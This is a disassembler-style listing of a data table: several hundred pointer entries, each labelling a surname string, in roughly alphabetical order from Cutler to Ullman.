dd offset aCutler ; "Cutler"
dd offset aCvek ; "Cvek"
dd offset aCyders ; "Cyders"
dd offset aDasilva ; "daSilva"
dd offset aDaldalian ; "Daldalian"
dd offset aDaly ; "Daly"
dd offset aDAmbra ; "D'Ambra"
dd offset aDanieli ; "Danieli"
dd offset aDante ; "Dante"
dd offset aDapice ; "Dapice"
dd offset aDArcangelo ; "D'arcangelo"
dd offset aDas ; "Das"
dd offset aDasgupta ; "Dasgupta"
dd offset aDaskalu ; "Daskalu"
dd offset aDavid ; "David"
dd offset aDawkins ; "Dawkins"
dd offset aDegennaro ; "DeGennaro"
dd offset aDelapena ; "DeLaPena"
dd offset aDelEnclos ; "del'Enclos"
dd offset aDerousse ; "deRousse"
dd offset aDebroff ; "Debroff"
dd offset aDees ; "Dees"
dd offset aDefeciani ; "Defeciani"
dd offset aDelattre ; "Delattre"
dd offset aDeleonRendon ; "Deleon-Rendon"
dd offset aDelger ; "Delger"
dd offset aDellAcqua ; "Dell'acqua"
dd offset aDeming ; "Deming"
dd offset aDempster ; "Dempster"
dd offset aDemusz ; "Demusz"
dd offset aDenault ; "Denault"
dd offset aDenham ; "Denham"
dd offset aDenison ; "Denison"
dd offset aDesombre ; "Desombre"
dd offset aDeutsch ; "Deutsch"
dd offset aDFini ; "D'fini"
dd offset aDicks ; "Dicks"
dd offset aDiefenbach ; "Diefenbach"
dd offset aDifabio ; "Difabio"
dd offset aDifronzo ; "Difronzo"
dd offset aDilworth ; "Dilworth"
dd offset aDionysius ; "Dionysius"
dd offset aDirksen ; "Dirksen"
dd offset aDockery ; "Dockery"
dd offset aDoherty ; "Doherty"
dd offset aDonahue ; "Donahue"
dd offset aDonner ; "Donner"
dd offset aDoonan ; "Doonan"
dd offset aDore ; "Dore"
dd offset aDorf ; "Dorf"
dd offset aDosi ; "Dosi"
dd offset aDoty ; "Doty"
dd offset aDoug ; "Doug"
dd offset aDowsland ; "Dowsland"
dd offset aDrinker ; "Drinker"
dd offset aDSouza ; "D'souza"
dd offset aDuffin ; "Duffin"
dd offset aDurrett ; "Durrett"
dd offset aDussault ; "Dussault"
dd offset aDwyer ; "Dwyer"
dd offset aEardley ; "Eardley"
dd offset aEbeling ; "Ebeling"
dd offset aEckel ; "Eckel"
dd offset aEdley ; "Edley"
dd offset aEdner ; "Edner"
dd offset aEdward ; "Edward"
dd offset aEickenhorst ; "Eickenhorst"
dd offset aEliasson ; "Eliasson"
dd offset aElmendorf ; "Elmendorf"
dd offset aElmerick ; "Elmerick"
dd offset aElvis ; "Elvis"
dd offset aEncinas ; "Encinas"
dd offset aEnyeart ; "Enyeart"
dd offset aEppling ; "Eppling"
dd offset aErbach ; "Erbach"
dd offset aErdman ; "Erdman"
dd offset aErdos ; "Erdos"
dd offset aErez ; "Erez"
dd offset aEspinoza ; "Espinoza"
dd offset aEstes ; "Estes"
dd offset aEtter ; "Etter"
dd offset aEuripides ; "Euripides"
dd offset aEverett ; "Everett"
dd offset aFabbris ; "Fabbris"
dd offset aFagan ; "Fagan"
dd offset aFaioes ; "Faioes"
dd offset aFalcoAcosta ; "Falco-Acosta"
dd offset aFalorsi ; "Falorsi"
dd offset aFaris ; "Faris"
dd offset aFarone ; "Farone"
dd offset aFarren ; "Farren"
dd offset aFasso ; "Fasso'"
dd offset aFates ; "Fates"
dd offset aFeigenbaum ; "Feigenbaum"
dd offset aFejzo ; "Fejzo"
dd offset aFeldman ; "Feldman"
dd offset aFernald ; "Fernald"
dd offset aFernandes ; "Fernandes"
dd offset aFerrante ; "Ferrante"
dd offset aFerriell ; "Ferriell"
dd offset aFeuer ; "Feuer"
dd offset aFido ; "Fido"
dd offset aField ; "Field"
dd offset aFink ; "Fink"
dd offset aFinkelstein ; "Finkelstein"
dd offset aFinnegan ; "Finnegan"
dd offset aFiorina ; "Fiorina"
dd offset aFisk ; "Fisk"
dd offset aFitzmaurice ; "Fitzmaurice"
dd offset aFlier ; "Flier"
dd offset aFlores ; "Flores"
dd offset aFolks ; "Folks"
dd offset aForester ; "Forester"
dd offset aFortes ; "Fortes"
dd offset aFortier ; "Fortier"
dd offset aFossey ; "Fossey"
dd offset aFossi ; "Fossi"
dd offset aFrancisco ; "Francisco"
dd offset aFranklinKenea ; "Franklin-Kenea"
dd offset aFranz ; "Franz"
dd offset aFrazierDavis ; "Frazier-Davis"
dd offset aFreid ; "Freid"
dd offset aFreundlich ; "Freundlich"
dd offset aFried ; "Fried"
dd offset aFriedland ; "Friedland"
dd offset aFrisken ; "Frisken"
dd offset aFrowiss ; "Frowiss"
dd offset aFryberger ; "Fryberger"
dd offset aFrye ; "Frye"
dd offset aFujiiAbe ; "Fujii-Abe"
dd offset aFuller ; "Fuller"
dd offset aFurth ; "Furth"
dd offset aFusaro ; "Fusaro"
dd offset aGabrielli ; "Gabrielli"
dd offset aGaggiotti ; "Gaggiotti"
dd offset aGaleotti ; "Galeotti"
dd offset aGalwey ; "Galwey"
dd offset aGambini ; "Gambini"
dd offset aGarfield ; "Garfield"
dd offset aGarman ; "Garman"
dd offset aGaronna ; "Garonna"
dd offset aGeller ; "Geller"
dd offset aGemberling ; "Gemberling"
dd offset aGeorgi ; "Georgi"
dd offset aGerrett ; "Gerrett"
dd offset aGhorai ; "Ghorai"
dd offset aGibbens ; "Gibbens"
dd offset aGibson ; "Gibson"
dd offset aGilbert ; "Gilbert"
dd offset aGili ; "Gili"
dd offset aGill ; "Gill"
dd offset aGillispie ; "Gillispie"
dd offset aGist ; "Gist"
dd offset aGleason ; "Gleason"
dd offset aGlegg ; "Glegg"
dd offset aGlendon ; "Glendon"
dd offset aGoldfarb ; "Goldfarb"
dd offset aGoncalves ; "Goncalves"
dd offset aGood ; "Good"
dd offset aGoodearl ; "Goodearl"
dd offset aGoody ; "Goody"
dd offset aGozzi ; "Gozzi"
dd offset aGravell ; "Gravell"
dd offset aGreenberg ; "Greenberg"
dd offset aGreenfeld ; "Greenfeld"
dd offset aGriffiths ; "Griffiths"
dd offset aGrigoletto ; "Grigoletto"
dd offset aGrummell ; "Grummell"
dd offset aGruner ; "Gruner"
dd offset aGruppe ; "Gruppe"
dd offset aGuenthart ; "Guenthart"
dd offset aGunn ; "Gunn"
dd offset aGuo ; "Guo"
dd offset aHa ; "Ha"
dd offset aHaar ; "Haar"
dd offset aHackman ; "Hackman"
dd offset aHackshaw ; "Hackshaw"
dd offset aHaley ; "Haley"
dd offset aHalkias ; "Halkias"
dd offset aHallowell ; "Hallowell"
dd offset aHalpert ; "Halpert"
dd offset aHambarzumjan ; "Hambarzumjan"
dd offset aHamer ; "Hamer"
dd offset aHammerness ; "Hammerness"
dd offset aHand ; "Hand"
dd offset aHanssen ; "Hanssen"
dd offset aHarding ; "Harding"
dd offset aHargraves ; "Hargraves"
dd offset aHarlow ; "Harlow"
dd offset aHarrigan ; "Harrigan"
dd offset aHartman ; "Hartman"
dd offset aHartmann ; "Hartmann"
dd offset aHartnett ; "Hartnett"
dd offset aHarwell ; "Harwell"
dd offset aHaviaras ; "Haviaras"
dd offset aHawkes ; "Hawkes"
dd offset aHayes ; "Hayes"
dd offset aHaynes ; "Haynes"
dd offset aHazlewood ; "Hazlewood"
dd offset aHeermans ; "Heermans"
dd offset aHeft ; "Heft"
dd offset aHeiland ; "Heiland"
dd offset aHellman ; "Hellman"
dd offset aHellmiss ; "Hellmiss"
dd offset aHelprin ; "Helprin"
dd offset aHemphill ; "Hemphill"
dd offset aHenery ; "Henery"
dd offset aHenrichs ; "Henrichs"
dd offset aHernandez ; "Hernandez"
dd offset aHerrera ; "Herrera"
dd offset aHester ; "Hester"
dd offset aHeubert ; "Heubert"
dd offset aHeyeck ; "Heyeck"
dd offset aHimmelfarb ; "Himmelfarb"
dd offset aHind ; "Hind"
dd offset aHirst ; "Hirst"
dd offset aHitchcock ; "Hitchcock"
dd offset aHoang ; "Hoang"
dd offset aHock ; "Hock"
dd offset aHoffer ; "Hoffer"
dd offset aHoffman ; "Hoffman"
dd offset aHokanson ; "Hokanson"
dd offset aHokoda ; "Hokoda"
dd offset aHolmes ; "Holmes"
dd offset aHoloien ; "Holoien"
dd offset aHolter ; "Holter"
dd offset aHolway ; "Holway"
dd offset aHolzman ; "Holzman"
dd offset aHooker ; "Hooker"
dd offset aHopkins ; "Hopkins"
dd offset aHorsley ; "Horsley"
dd offset aHoshida ; "Hoshida"
dd offset aHostage ; "Hostage"
dd offset aHottle ; "Hottle"
dd offset aHoward ; "Howard"
dd offset aHoy ; "Hoy"
dd offset aHuey ; "Huey"
dd offset aHuidekoper ; "Huidekoper"
dd offset aHungerford ; "Hungerford"
dd offset aHuntington ; "Huntington"
dd offset aHupp ; "Hupp"
dd offset aHurtubise ; "Hurtubise"
dd offset aHutchings ; "Hutchings"
dd offset aHyde ; "Hyde"
dd offset aIaquinta ; "Iaquinta"
dd offset aIchikawa ; "Ichikawa"
dd offset aIgarashi ; "Igarashi"
dd offset aInamura ; "Inamura"
dd offset aInniss ; "Inniss"
dd offset aIsaac ; "Isaac"
dd offset aIsaievych ; "Isaievych"
dd offset aIsbill ; "Isbill"
dd offset aIsserman ; "Isserman"
dd offset aIyer ; "Iyer"
dd offset aJacenko ; "Jacenko"
dd offset aJackson ; "Jackson"
dd offset aJagers ; "Jagers"
dd offset aJagger ; "Jagger"
dd offset aJagoe ; "Jagoe"
dd offset aJain ; "Jain"
dd offset aJamil ; "Jamil"
dd offset aJanjigian ; "Janjigian"
dd offset aJarnagin ; "Jarnagin"
dd offset aJarrell ; "Jarrell"
dd offset aJay ; "Jay"
dd offset aJeffers ; "Jeffers"
dd offset aJellis ; "Jellis"
dd offset aJenkins ; "Jenkins"
dd offset aJespersen ; "Jespersen"
dd offset aJewett ; "Jewett"
dd offset aJohannesson ; "Johannesson"
dd offset aJohannsen ; "Johannsen"
dd offset aJohns ; "Johns"
dd offset aJolly ; "Jolly"
dd offset aJorgensen ; "Jorgensen"
dd offset aJucks ; "Jucks"
dd offset aJuliano ; "Juliano"
dd offset aJulious ; "Julious"
dd offset aKabbash ; "Kabbash"
dd offset aKaboolian ; "Kaboolian"
dd offset aKafadar ; "Kafadar"
dd offset aKalbfleisch ; "Kalbfleisch"
dd offset aKaligian ; "Kaligian"
dd offset aKalil ; "Kalil"
dd offset aKalinowski ; "Kalinowski"
dd offset aKalman ; "Kalman"
dd offset aKamel ; "Kamel"
dd offset aKangis ; "Kangis"
dd offset aKarpouzes ; "Karpouzes"
dd offset aKassower ; "Kassower"
dd offset aKasten ; "Kasten"
dd offset aKawachi ; "Kawachi"
dd offset aKee ; "Kee"
dd offset aKeenan ; "Keenan"
dd offset aKeepper ; "Keepper"
dd offset aKeith ; "Keith"
dd offset aKelker ; "Kelker"
dd offset aKelsey ; "Kelsey"
dd offset aKempton ; "Kempton"
dd offset aKemsley ; "Kemsley"
dd offset aKendall ; "Kendall"
dd offset aKerry ; "Kerry"
dd offset aKeul ; "Keul"
dd offset aKhong ; "Khong"
dd offset aKimmel ; "Kimmel"
dd offset aKimmett ; "Kimmett"
dd offset aKimura ; "Kimura"
dd offset aKindall ; "Kindall"
dd offset aKinsley ; "Kinsley"
dd offset aKippenberger ; "Kippenberger"
dd offset aKirscht ; "Kirscht"
dd offset aKittridge ; "Kittridge"
dd offset aKleckner ; "Kleckner"
dd offset aKleiman ; "Kleiman"
dd offset aKleinfelder ; "Kleinfelder"
dd offset aKlemperer ; "Klemperer"
dd offset aKling ; "Kling"
dd offset aKlinkenborg ; "Klinkenborg"
dd offset aKlint ; "Klint"
dd offset aKnuff ; "Knuff"
dd offset aKobrick ; "Kobrick"
dd offset aKoch ; "Koch"
dd offset aKohn ; "Kohn"
dd offset aKoivumaki ; "Koivumaki"
dd offset aKommer ; "Kommer"
dd offset aKoniaris ; "Koniaris"
dd offset aKonrad ; "Konrad"
dd offset aKool ; "Kool"
dd offset aKorzybski ; "Korzybski"
dd offset aKotter ; "Kotter"
dd offset aKovaks ; "Kovaks"
dd offset aKraemer ; "Kraemer"
dd offset aKrailo ; "Krailo"
dd offset aKrasney ; "Krasney"
dd offset aKraus ; "Kraus"
dd offset aKroemer ; "Kroemer"
dd offset aKrysiak ; "Krysiak"
dd offset aKuenzli ; "Kuenzli"
dd offset aKumar ; "Kumar"
dd offset aKusman ; "Kusman"
dd offset aKuwabara ; "Kuwabara"
dd offset aLa ; "La"
dd offset aLabunka ; "Labunka"
dd offset aLafler ; "Lafler"
dd offset aLaing ; "Laing"
dd offset aLallemant ; "Lallemant"
dd offset aLandes ; "Landes"
dd offset aLankes ; "Lankes"
dd offset aLantieri ; "Lantieri"
dd offset aLanzit ; "Lanzit"
dd offset aLaserna ; "Laserna"
dd offset aLashley ; "Lashley"
dd offset aLawless ; "Lawless"
dd offset aLecar ; "Lecar"
dd offset aLecce ; "Lecce"
dd offset aLeclercq ; "Leclercq"
dd offset aLeite ; "Leite"
dd offset aLenard ; "Lenard"
dd offset aLEnclos ; "l'Enclos"
dd offset aLesser ; "Lesser"
dd offset aLessi ; "Lessi"
dd offset aLiakos ; "Liakos"
dd offset aLidano ; "Lidano"
dd offset aLiem ; "Liem"
dd offset aLight ; "Light"
dd offset aLightfoot ; "Lightfoot"
dd offset aLim ; "Lim"
dd offset aLinares ; "Linares"
dd offset aLinda ; "Linda"
dd offset aLinder ; "Linder"
dd offset aLine ; "Line"
dd offset aLinehan ; "Linehan"
dd offset aLinzee ; "Linzee"
dd offset aLippmann ; "Lippmann"
dd offset aLipponen ; "Lipponen"
dd offset aLittle ; "Little"
dd offset aLitvak ; "Litvak"
dd offset aLivernash ; "Livernash"
dd offset aLivi ; "Livi"
dd offset aLivolsi ; "Livolsi"
dd offset aLizardo ; "Lizardo"
dd offset aLocatelli ; "Locatelli"
dd offset aLongworth ; "Longworth"
dd offset aLoss ; "Loss"
dd offset aLoveman ; "Loveman"
dd offset aLowenstein ; "Lowenstein"
dd offset aLoza ; "Loza"
dd offset aLubin ; "Lubin"
dd offset aLucas ; "Lucas"
dd offset aLuciano ; "Luciano"
dd offset aLuczkow ; "Luczkow"
dd offset aLuecke ; "Luecke"
dd offset aLunetta ; "Lunetta"
dd offset aLuoma ; "Luoma"
dd offset aLussier ; "Lussier"
dd offset aLutcavage ; "Lutcavage"
dd offset aLuzader ; "Luzader"
dd offset aMa ; "Ma"
dd offset aMaccormac ; "Maccormac"
dd offset aMacdonald ; "Macdonald"
dd offset aMaceachern ; "Maceachern"
dd offset aMacintyre ; "Macintyre"
dd offset aMackenney ; "Mackenney"
dd offset aMacmillan ; "MacMillan"
dd offset aMacy ; "Macy"
dd offset aMadigan ; "Madigan"
dd offset aMaggio ; "Maggio"
dd offset aMahony ; "Mahony"
dd offset aMaier ; "Maier"
dd offset aMaineHershey ; "Maine-Hershey"
dd offset aMaisano ; "Maisano"
dd offset aMalatesta ; "Malatesta"
dd offset aMaller ; "Maller"
dd offset aMalova ; "Malova"
dd offset aManalis ; "Manalis"
dd offset aMandel ; "Mandel"
dd offset aManganiello ; "Manganiello"
dd offset aMantovan ; "Mantovan"
dd offset aMarch ; "March"
dd offset aMarchbanks ; "Marchbanks"
dd offset aMarcus ; "Marcus"
dd offset aMargalit ; "Margalit"
dd offset aMargetts ; "Margetts"
dd offset aMarques ; "Marques"
dd offset aMartinez ; "Martinez"
dd offset aMartochio ; "Martochio"
dd offset aMarton ; "Marton"
dd offset aMarubini ; "Marubini"
dd offset aMass ; "Mass"
dd offset aMatalka ; "Matalka"
dd offset aMatarazzo ; "Matarazzo"
dd offset aMatsukata ; "Matsukata"
dd offset aMattson ; "Mattson"
dd offset aMauzy ; "Mauzy"
dd offset aMay ; "May"
dd offset aMazzali ; "Mazzali"
dd offset aMazziotta ; "Mazziotta"
dd offset aMcbride ; "Mcbride"
dd offset aMccaffery ; "Mccaffery"
dd offset aMccall ; "Mccall"
dd offset aMcclearn ; "Mcclearn"
dd offset aMcdowell ; "Mcdowell"
dd offset aMcelroy ; "Mcelroy"
dd offset aMcfadden ; "McFadden"
dd offset aMcghee ; "Mcghee"
dd offset aMcgoldrick ; "Mcgoldrick"
dd offset aMcilroy ; "McIlroy"
dd offset aMcintosh ; "Mcintosh"
dd offset aMckenna ; "Mckenna"
dd offset aMclane ; "Mclane"
dd offset aMclaren ; "Mclaren"
dd offset aMcnealy ; "Mcnealy"
dd offset aMcnulty ; "Mcnulty"
dd offset aMeccariello ; "Meccariello"
dd offset aMemisoglu ; "Memisoglu"
dd offset aMenzies ; "Menzies"
dd offset aMerikoski ; "Merikoski"
dd offset aMerlani ; "Merlani"
dd offset aMerminod ; "Merminod"
dd offset aMerseth ; "Merseth"
dd offset aMerz ; "Merz"
dd offset aMetelka ; "Metelka"
dd offset aMetropolis ; "Metropolis"
dd offset aMeurer ; "Meurer"
dd offset aMichelman ; "Michelman"
dd offset aMiddle ; "Middle"
dd offset aMieher ; "Mieher"
dd offset aMills ; "Mills"
dd offset aMinh ; "Minh"
dd offset aMini ; "Mini"
dd offset aMinichiello ; "Minichiello"
dd offset aGonzalez ; "Gonzalez"
dd offset aMitropoulos ; "Mitropoulos"
dd offset aMittal ; "Mittal"
dd offset aMocroft ; "Mocroft"
dd offset aModestino ; "Modestino"
dd offset aMoeller ; "Moeller"
dd offset aMohr ; "Mohr"
dd offset aMoiamedi ; "Moiamedi"
dd offset aMonque ; "Monque"
dd offset aMontilio ; "Montilio"
dd offset aMooredech_ ; "MooreDeCh."
dd offset aMorani ; "Morani"
dd offset aMoreton ; "Moreton"
dd offset aMorrison ; "Morrison"
dd offset aMorrow ; "Morrow"
dd offset aMortimer ; "Mortimer"
dd offset aMosher ; "Mosher"
dd offset aMosler ; "Mosler"
dd offset aMostafavi ; "Mostafavi"
dd offset aMotooka ; "Motooka"
dd offset aMudarri ; "Mudarri"
dd offset aMuello ; "Muello"
dd offset aMugnai ; "Mugnai"
dd offset aMulkern ; "Mulkern"
dd offset aMulroy ; "Mulroy"
dd offset aMumford ; "Mumford"
dd offset aMussachio ; "Mussachio"
dd offset aNaddeo ; "Naddeo"
dd offset aNapolitano ; "Napolitano"
dd offset aNardi ; "Nardi"
dd offset aNardone ; "Nardone"
dd offset aNaviaux ; "Naviaux"
dd offset aNayduch ; "Nayduch"
dd offset aNelson ; "Nelson"
dd offset aNenna ; "Nenna"
dd offset aNesci ; "Nesci"
dd offset aNeuman ; "Neuman"
dd offset aNewfeld ; "Newfeld"
dd offset aNewlin ; "Newlin"
dd offset aNg ; "Ng"
dd offset aNi_0 ; "Ni"
dd offset aNickerson ; "Nickerson"
dd offset aNickoloff ; "Nickoloff"
dd offset aNisenson ; "Nisenson"
dd offset aNitabach ; "Nitabach"
dd offset aNotman ; "Notman"
dd offset aNuzum ; "Nuzum"
dd offset aOcougne ; "Ocougne"
dd offset aOgata ; "Ogata"
dd offset aOh ; "Oh"
dd offset aOHagan ; "O'hagan"
dd offset aOldford ; "Oldford"
dd offset aOlsen ; "Olsen"
dd offset aOlson ; "Olson"
dd offset aOlszewski ; "Olszewski"
dd offset aOMalley ; "O'malley"
dd offset aOman ; "Oman"
dd offset aOMeara ; "O'meara"
dd offset aOpel ; "Opel"
dd offset aOray ; "Oray"
dd offset aOrfield ; "Orfield"
dd offset aOrsi ; "Orsi"
dd offset aOspina ; "Ospina"
dd offset aOstrowski ; "Ostrowski"
dd offset aOttaviani ; "Ottaviani"
dd offset aOtten ; "Otten"
dd offset aOuchida ; "Ouchida"
dd offset aOvid ; "Ovid"
dd offset aPaesdealmeida ; "PaesDealmeida"
dd offset aPaine ; "Paine"
dd offset aPalayoor ; "Palayoor"
dd offset aPalepu ; "Palepu"
dd offset aPallara ; "Pallara"
dd offset aPalmitesta ; "Palmitesta"
dd offset aPanadero ; "Panadero"
dd offset aPanizzon ; "Panizzon"
dd offset aPantilla ; "Pantilla"
dd offset aPaoletti ; "Paoletti"
dd offset aParmeggiani ; "Parmeggiani"
dd offset aParris ; "Parris"
dd offset aPartridge ; "Partridge"
dd offset aPascucci ; "Pascucci"
dd offset aPatefield ; "Patefield"
dd offset aPatrick ; "Patrick"
dd offset aPattullo ; "Pattullo"
dd offset aPavetti ; "Pavetti"
dd offset aPavlon ; "Pavlon"
dd offset aPawloski ; "Pawloski"
dd offset aPaynter ; "Paynter"
dd offset aPeabody ; "Peabody"
dd offset aPearlberg ; "Pearlberg"
dd offset aPederson ; "Pederson"
dd offset aPeishel ; "Peishel"
dd offset aPenny ; "Penny"
dd offset aPereira ; "Pereira"
dd offset aPerko ; "Perko"
dd offset aPerlak ; "Perlak"
dd offset aPerlman ; "Perlman"
dd offset aPerna ; "Perna"
dd offset aPerone ; "Perone"
dd offset aPerrimon ; "Perrimon"
dd offset aPeters ; "Peters"
dd offset aPetruzello ; "Petruzello"
dd offset aPettibone ; "Pettibone"
dd offset aPettit ; "Pettit"
dd offset aPfister ; "Pfister"
dd offset aPilbeam ; "Pilbeam"
dd offset aPinot ; "Pinot"
dd offset aPlancon ; "Plancon"
dd offset aPlant ; "Plant"
dd offset aPlasket ; "Plasket"
dd offset aPlous ; "Plous"
dd offset aPo ; "Po"
dd offset aPocobene ; "Pocobene"
dd offset aPoincaire ; "Poincaire"
dd offset aPointer ; "Pointer"
dd offset aPoirier ; "Poirier"
dd offset aPolak ; "Polak"
dd offset aPolanyi ; "Polanyi"
dd offset aPolitis ; "Politis"
dd offset aPoma ; "Poma"
dd offset aPoolman ; "Poolman"
dd offset aPowers ; "Powers"
dd offset aPresper ; "Presper"
dd offset aPreucel ; "Preucel"
dd offset aPrevost ; "Prevost"
dd offset aPritchard ; "Pritchard"
dd offset aPritz ; "Pritz"
dd offset aProietti ; "Proietti"
dd offset aProthrowStith ; "Prothrow-Stith"
dd offset aPuccia ; "Puccia"
dd offset aPugh ; "Pugh"
dd offset aPynchon ; "Pynchon"
dd offset aQuaday ; "Quaday"
dd offset aQuetin ; "Quetin"
dd offset aRabe ; "Rabe"
dd offset aRabkin ; "Rabkin"
dd offset aRadeke ; "Radeke"
dd offset aRajagopalan ; "Rajagopalan"
dd offset aRaney ; "Raney"
dd offset aRangan ; "Rangan"
dd offset aRankin ; "Rankin"
dd offset aRapple ; "Rapple"
dd offset aRayport ; "Rayport"
dd offset aReddenTyler ; "Redden-Tyler"
dd offset aReedquist ; "Reedquist"
dd offset aCunningham ; "Cunningham"
dd offset aReinold ; "Reinold"
dd offset aRemak ; "Remak"
dd offset aRenick ; "Renick"
dd offset aRepetto ; "Repetto"
dd offset aResnik ; "Resnik"
dd offset aRhea ; "Rhea"
dd offset aRichmond ; "Richmond"
dd offset aRielly ; "Rielly"
dd offset aRindos ; "Rindos"
dd offset aRineer ; "Rineer"
dd offset aRish ; "Rish"
dd offset aRivera ; "Rivera"
dd offset aRobinson ; "Robinson"
dd offset aRocha ; "Rocha"
dd offset aRoesler ; "Roesler"
dd offset aRogers ; "Rogers"
dd offset aRonen ; "Ronen"
dd offset aRow ; "Row"
dd offset aRoyal ; "Royal"
dd offset aRu ; "Ru"
dd offset aRuan ; "Ruan"
dd offset aRuderman ; "Ruderman"
dd offset aRuescher ; "Ruescher"
dd offset aRush ; "Rush"
dd offset aRyu ; "Ryu"
dd offset aSabatello ; "Sabatello"
dd offset aSadler ; "Sadler"
dd offset aSafire ; "Safire"
dd offset aSahu ; "Sahu"
dd offset aSali ; "Sali"
dd offset aSamson ; "Samson"
dd offset aSanchezRamirez ; "Sanchez-Ramirez"
dd offset aSanna ; "Sanna"
dd offset aSapers ; "Sapers"
dd offset aSarin ; "Sarin"
dd offset aSartore ; "Sartore"
dd offset aSase ; "Sase"
dd offset aSatin ; "Satin"
dd offset aSatta ; "Satta"
dd offset aSatterthwaite ; "Satterthwaite"
dd offset aSawtell ; "Sawtell"
dd offset aSayied ; "Sayied"
dd offset aScarponi ; "Scarponi"
dd offset aScepan ; "Scepan"
dd offset aScharf ; "Scharf"
dd offset aScharlemann ; "Scharlemann"
dd offset aScheiner ; "Scheiner"
dd offset aSchiano ; "Schiano"
dd offset aSchifini ; "Schifini"
dd offset aSchilling ; "Schilling"
dd offset aSchmitt ; "Schmitt"
dd offset aSchossberger ; "Schossberger"
dd offset aSchuman ; "Schuman"
dd offset aSchutte ; "Schutte"
dd offset aSchuyler ; "Schuyler"
dd offset aSchwan ; "Schwan"
dd offset aSchwickrath ; "Schwickrath"
dd offset aScovel ; "Scovel"
dd offset aScudder ; "Scudder"
dd offset aSeaton ; "Seaton"
dd offset aSeeber ; "Seeber"
dd offset aSegal ; "Segal"
dd offset aSekler ; "Sekler"
dd offset aSelvage ; "Selvage"
dd offset aSen ; "Sen"
dd offset aSennett ; "Sennett"
dd offset aSeterdahl ; "Seterdahl"
dd offset aSexton ; "Sexton"
dd offset aSeyfert ; "Seyfert"
dd offset aShaikh ; "Shaikh"
dd offset aShakis ; "Shakis"
dd offset aShankland ; "Shankland"
dd offset aShanley ; "Shanley"
dd offset aShar ; "Shar"
dd offset aShatrov ; "Shatrov"
dd offset aShavelson ; "Shavelson"
dd offset aShea ; "Shea"
dd offset aSheats ; "Sheats"
dd offset aShepherd ; "Shepherd"
dd offset aSheppard ; "Sheppard"
dd offset aShepstone ; "Shepstone"
dd offset aShesko ; "Shesko"
dd offset aShia ; "Shia"
dd offset aShibata ; "Shibata"
dd offset aShimon ; "Shimon"
dd offset aSiesto ; "Siesto"
dd offset aSigalot ; "Sigalot"
dd offset aSigini ; "Sigini"
dd offset aSigna ; "Signa"
dd offset aSilverman ; "Silverman"
dd offset aSilvetti ; "Silvetti"
dd offset aSinsabaugh ; "Sinsabaugh"
dd offset aSirilli ; "Sirilli"
dd offset aSites ; "Sites"
dd offset aSkane ; "Skane"
dd offset aSkerry ; "Skerry"
dd offset aSkoda ; "Skoda"
dd offset aSloan ; "Sloan"
dd offset aSlowe ; "Slowe"
dd offset aSmilow ; "Smilow"
dd offset aSniffen ; "Sniffen"
dd offset aSnodgrass ; "Snodgrass"
dd offset aSocolow ; "Socolow"
dd offset aSolon ; "Solon"
dd offset aSomers ; "Somers"
dd offset aSommariva ; "Sommariva"
dd offset aSorabella ; "Sorabella"
dd offset aSorg ; "Sorg"
dd offset aSottak ; "Sottak"
dd offset aSoukup ; "Soukup"
dd offset aSoule ; "Soule"
dd offset aSoultanian ; "Soultanian"
dd offset aSpanier ; "Spanier"
dd offset aSparrow ; "Sparrow"
dd offset aSpaulding ; "Spaulding"
dd offset aSpeizer ; "Speizer"
dd offset aSpence ; "Spence"
dd offset aSperber ; "Sperber"
dd offset aSpicer ; "Spicer"
dd offset aSpiegelhalter ; "Spiegelhalter"
dd offset aSpiliotis ; "Spiliotis"
dd offset aSpinrad ; "Spinrad"
dd offset aStmartin ; "StMartin"
dd offset aStalvey ; "Stalvey"
dd offset aStam ; "Stam"
dd offset aStang ; "Stang"
dd offset aStassinopolus ; "Stassinopolus"
dd offset aStates ; "States"
dd offset aStatlender ; "Statlender"
dd offset aStefani ; "Stefani"
dd offset aSteiner ; "Steiner"
dd offset aStephanian ; "Stephanian"
dd offset aStepniewska ; "Stepniewska"
dd offset aStewartOaten ; "Stewart-Oaten"
dd offset aStiepock ; "Stiepock"
dd offset aStillwell ; "Stillwell"
dd offset aStock ; "Stock"
dd offset aStockton ; "Stockton"
dd offset aStockwell ; "Stockwell"
dd offset aStolzenberg ; "Stolzenberg"
dd offset aStonich ; "Stonich"
dd offset aStorer ; "Storer"
dd offset aStott ; "Stott"
dd offset aStrange ; "Strange"
dd offset aStrauch ; "Strauch"
dd offset aStreiff ; "Streiff"
dd offset aStringer ; "Stringer"
dd offset aSullivan ; "Sullivan"
dd offset aSumner ; "Sumner"
dd offset aSuo ; "Suo"
dd offset aSurdam ; "Surdam"
dd offset aSweeting ; "Sweeting"
dd offset aSweetser ; "Sweetser"
dd offset aSwindle ; "Swindle"
dd offset aTagiuri ; "Tagiuri"
dd offset aTai ; "Tai"
dd offset aTalaugon ; "Talaugon"
dd offset aTambiah ; "Tambiah"
dd offset aTandler ; "Tandler"
dd offset aTanowitz ; "Tanowitz"
dd offset aTatar ; "Tatar"
dd offset aTaveras ; "Taveras"
dd offset aTawn ; "Tawn"
dd offset aTcherepnin ; "Tcherepnin"
dd offset aTeague ; "Teague"
dd offset aTemes ; "Temes"
dd offset aTemmer ; "Temmer"
dd offset aTenney ; "Tenney"
dd offset aTerracini ; "Terracini"
dd offset aThan ; "Than"
dd offset aThavaneswaran ; "Thavaneswaran"
dd offset aTheodos ; "Theodos"
dd offset aThibault ; "Thibault"
dd offset aThisted ; "Thisted"
dd offset aThomsen ; "Thomsen"
dd offset aThroop ; "Throop"
dd offset aTierney ; "Tierney"
dd offset aTill ; "Till"
dd offset aTimmons ; "Timmons"
dd offset aTofallis ; "Tofallis"
dd offset aTollestrup ; "Tollestrup"
dd offset aTolls ; "Tolls"
dd offset aTolman ; "Tolman"
dd offset aTomford ; "Tomford"
dd offset aToomer ; "Toomer"
dd offset aTopulos ; "Topulos"
dd offset aTorresi ; "Torresi"
dd offset aTorske ; "Torske"
dd offset aTowler ; "Towler"
dd offset aToye ; "Toye"
dd offset aTraebert ; "Traebert"
dd offset aTrenga ; "Trenga"
dd offset aTrewin ; "Trewin"
dd offset aTringali ; "Tringali"
dd offset aTroiani ; "Troiani"
dd offset aTroy ; "Troy"
dd offset aTruss ; "Truss"
dd offset aTsiatis ; "Tsiatis"
dd offset aTsomides ; "Tsomides"
dd offset aTsukurov ; "Tsukurov"
dd offset aTuck ; "Tuck"
dd offset aTudge ; "Tudge"
dd offset aTukan ; "Tukan"
dd offset aTurano ; "Turano"
dd offset aTurek ; "Turek"
dd offset aTuttle ; "Tuttle"
dd offset aTwells ; "Twells"
dd offset aTzamarias ; "Tzamarias"
dd offset aUllman ; "Ullman"
